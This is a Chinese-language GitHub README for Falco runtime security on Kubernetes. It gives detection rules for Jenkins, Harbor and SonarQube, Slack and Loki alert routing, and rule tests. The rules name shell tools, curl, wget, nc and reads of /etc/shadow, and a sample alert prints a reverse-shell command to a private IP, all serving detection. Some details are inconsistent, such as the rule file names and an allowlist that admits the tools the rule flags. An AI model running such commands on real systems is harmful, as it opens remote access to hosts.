srujantata/runtime-security-falco
GitHub: srujantata/runtime-security-falco
这是一个基于 Falco 的 Kubernetes 运行时安全工具,利用 eBPF 监控系统调用来检测容器内的异常活动并发送告警。
Stars: 0 | Forks: 0
# 使用 Falco 的运行时安全
[](https://github.com/srujantata/runtime-security-falco/actions)
**Falco** 利用 eBPF 监控每个 Kubernetes 节点上的每一个系统调用,并在检测到异常行为——如 Jenkins 内部启动了 shell、从未知 IP 推送了镜像、容器尝试读取 `/etc/shadow` 文件——的瞬间触发告警。告警通过 **Falcosidekick** 转发至 Slack 和 Loki,用于即时响应和长期分析。
## 架构
```
Kernel syscalls (eBPF hook)
│
▼
Falco (per-node DaemonSet)
└── evaluates rules in real-time
│
▼ alert JSON
Falcosidekick (single Deployment)
├── Slack ──► #security-alerts channel
└── Loki ──► Grafana dashboard (long-term)
```
## 此 DevOps 工具链的自定义规则
规则针对集群中实际运行的服务(Jenkins、SonarQube、Harbor)进行定制。Falco 默认规则涵盖通用 Linux 场景;而这些规则针对的是 *您的* 技术栈。
### Jenkins 运行意外进程
```
# rules/jenkins-规则.yaml
- rule: Jenkins Running Unexpected Process
desc: >
Jenkins should only run Java processes. Anything else (bash, curl, wget, nc)
could indicate a build escaping its container or a compromised build step.
condition: >
spawned_process
and container.label.app = "jenkins"
and proc.name != "java"
and not proc.name in (known_jenkins_helper_binaries)
output: >
Unexpected process in Jenkins container
(proc=%proc.name cmdline=%proc.cmdline user=%user.name
container=%container.name image=%container.image.repository)
priority: ERROR
tags: [jenkins, process, mitre_execution]
- list: known_jenkins_helper_binaries
items: [sh, bash, git, ssh, tee, grep, sed, awk, python3]
```
### 从未知 IP 推送 Harbor 镜像
```
- rule: Harbor Image Push from Unknown IP
desc: >
Image pushes to Harbor from IPs outside the cluster CIDR or known CI runner
ranges may indicate credential theft or supply chain attack.
condition: >
spawned_process
and container.label.app = "harbor-core"
and proc.cmdline contains "push"
and not fd.sip in (trusted_cidr_ranges)
output: >
Unauthorized Harbor image push detected
(src_ip=%fd.sip proc=%proc.cmdline container=%container.name)
priority: CRITICAL
tags: [harbor, network, supply-chain]
- list: trusted_cidr_ranges
items: ["10.0.0.0/8", "172.16.0.0/12"]
```
### SonarQube 生成 Shell
```
- rule: SonarQube Spawning Shell
desc: >
SonarQube is a Java application and should never spawn a shell.
Shell execution inside SonarQube may indicate RCE via a vulnerable plugin.
condition: >
spawned_process
and container.label.app = "sonarqube"
and proc.name in (shell_binaries)
output: >
Shell spawned inside SonarQube container — possible RCE
(shell=%proc.name cmdline=%proc.cmdline user=%user.name
container=%container.name)
priority: CRITICAL
tags: [sonarqube, shell, mitre_execution, rce]
- list: shell_binaries
items: [sh, bash, dash, zsh, ksh, fish]
```
### 容器读取敏感文件
```
- rule: Container Reading Sensitive Host File
desc: Detect containers attempting to read /etc/shadow or /etc/passwd on the host.
condition: >
open_read
and container
and fd.name in (/etc/shadow, /etc/passwd, /root/.ssh/authorized_keys)
output: >
Sensitive file read inside container
(file=%fd.name proc=%proc.name container=%container.name
image=%container.image.repository)
priority: WARNING
tags: [filesystem, credential-access, mitre_credential_access]
```
## 通过 Falcosidekick 转发告警
### Helm 安装
```
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco \
--namespace falco --create-namespace \
--set driver.kind=ebpf \
--set falcosidekick.enabled=true \
--set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK_URL}" \
--set falcosidekick.config.loki.hostport="http://loki.monitoring.svc.cluster.local:3100" \
--set falcosidekick.config.loki.tenant="falco" \
--set customRules."jenkins-rules\.yaml"="$(cat rules/jenkins-rules.yaml)"
```
### Slack 告警格式
当规则触发时,Slack 会收到:
```
🚨 [CRITICAL] SonarQube Spawning Shell
Rule: SonarQube Spawning Shell
Priority: CRITICAL
Time: 2026-05-18T14:23:01Z
Host: ip-10-0-1-45.ec2.internal
Container: sonarqube-7d9f8b6c4-xk2jp
Image: sonarqube:10.4-community
Detail:
shell=bash cmdline=bash -i >& /dev/tcp/10.0.99.1/4444 0>&1
user=sonarqube
Tags: sonarqube, shell, rce
```
## 使用事件注入测试规则
使用 `falco-driver-loader` 事件注入在预发布环境中模拟规则触发:
```
# 测试:模拟在容器内生成shell
kubectl exec -n falco \
$(kubectl get pod -n falco -l app=falco -o name | head -1) -- \
falco-event-generator run syscall --loop
# 测试特定规则
falco -r rules/jenkins-rules.yaml -e \
'{"evt.type":"execve","proc.name":"nc","container.label.app":"jenkins"}'
```
## 误报调优
新规则最初会产生误报。通过缩小条件或使用宏来调优。
```
# 之前:触发Jenkins使用的每个构建工具
- rule: Jenkins Running Unexpected Process
condition: >
spawned_process and container.label.app = "jenkins"
and proc.name != "java"
# 之后:允许列表合法构建工具
- macro: jenkins_build_tools
condition: >
proc.name in (java, git, mvn, gradle, npm, node, python3,
sh, bash, tee, grep, awk, sed, curl, wget)
- rule: Jenkins Running Unexpected Process
condition: >
spawned_process
and container.label.app = "jenkins"
and not jenkins_build_tools
```
## Grafana 仪表板(通过 Loki)
查询过去 24 小时内的所有 CRITICAL 告警:
```
{job="falco"} | json | priority="CRITICAL" | line_format "{{.time}} {{.rule}} — {{.output}}"
```
按触发次数排名的热门规则(过去 7 天):
```
sum by (rule) (count_over_time({job="falco"} | json [7d]))
```
## 展示的技能
- 在 Kubernetes 上使用 eBPF 驱动部署 Falco DaemonSet
- 针对特定 DevOps 工具(Jenkins、Harbor、SonarQube)定制 Falco 规则
- 使用 Falcosidekick 进行多目标告警路由(Slack + Loki)
- 通过事件注入测试规则
- 使用宏和白名单进行误报调优
- 用于安全事件分析的 Grafana/LogQL 仪表板
- 在检测规则上添加 MITRE ATT&CK 标签
标签:Chrome Headless, DevOps安全, Docker镜像, Falco, Falcosidekick, Harbor安全, Jenkins安全, Kubernetes安全, PagerDuty集成, Slack集成, Web截图, 云计算, 加密挖矿检测, 告警系统, 子域名突变, 实时检测, 容器安全, 异常检测, 持续集成安全, 敏感词过滤, 规则引擎, 镜像仓库安全, 镜像推送监控